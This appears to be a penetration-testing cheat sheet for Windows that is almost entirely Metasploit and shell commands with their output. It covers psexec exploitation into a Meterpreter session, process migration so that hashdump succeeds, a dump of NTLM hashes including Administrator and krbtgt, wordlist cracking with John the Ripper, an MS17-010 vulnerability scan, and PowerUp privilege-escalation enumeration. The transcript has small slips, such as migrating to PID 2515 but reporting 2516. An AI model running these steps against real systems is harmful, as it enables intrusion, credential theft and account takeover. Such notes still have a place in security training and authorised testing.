Meterpreter

msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set RHOSTS x.y.z.z
msf6 exploit(windows/smb/psexec) > exploit
meterpreter > ps

If you have this error:

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

We can migrate to another process:

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session  User                          Path
 ---   ----  ----              ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System            x64   0
 68    4     Registry          x64   0
 396   4     smss.exe          x64   0
 544   532   csrss.exe         x64   0
 2516  736   dns.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dns.exe
meterpreter -> migrate 2515
[*] Migrating from 1108 to 2516...
[*] Migration completed successfully.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9ac3de200cb4d510fed7610c7037292:::
ballen:1112:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
jfox:1115:aad3b435b51404eeaad3b435b51404ee:c64540b95e2b2f36f0291c3a9fb8b840:::
lnelson:1116:aad3b435b51404eeaad3b435b51404ee:e88186a7bb7980c913dc90c7caa2a3b9:::
erptest:1117:aad3b435b51404eeaad3b435b51404ee:8b9ca7572fe60a1559686dba90726715:::
ACME-TEST$:1008:aad3b435b51404eeaad3b435b51404ee:2c03f65f69ecd3ed0a8c3f850a8b253d:::

And we can try to crack the password of jchambers:

$ cat ntlm 
69596c7aa1e8daee17f8e78870e25a5c
$ ~/src/john/run/john --format=NT --wordlist rockyou.txt ntlm
Warning: invalid UTF-8 seen reading rockyou.txt
Using default input encoding: UTF-8
Loaded 52 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Cracked 1 password hash (is in /home/user/src/john/run/john.pot), use "--show"
Remaining 51 password hashes with no different salts
Warning: no OpenMP support for this hash type, consider --fork=4
Proceeding with wordlist:/home/user/src/john/run/password.lst
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
0g 0:00:00:00 DONE (2024-02-20 20:12) 0g/s 12826Kp/s 12826Kc/s 654144KC/s Dontrell..sambarock
Session completed.

Identifying the vulnerability

We can try to identify if the Windows target is vulnerable to the CVE ms17-010:

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.71.98
RHOSTS => 10.10.71.98
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit

[+] 10.10.71.98:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.71.98:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Enumerate Windows

We can use the PowerShell script PowerUp.ps1 for enumerating a windows system:

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

Import-Module C:\Users\toto\Powerup.ps1
Invoke-AllChecks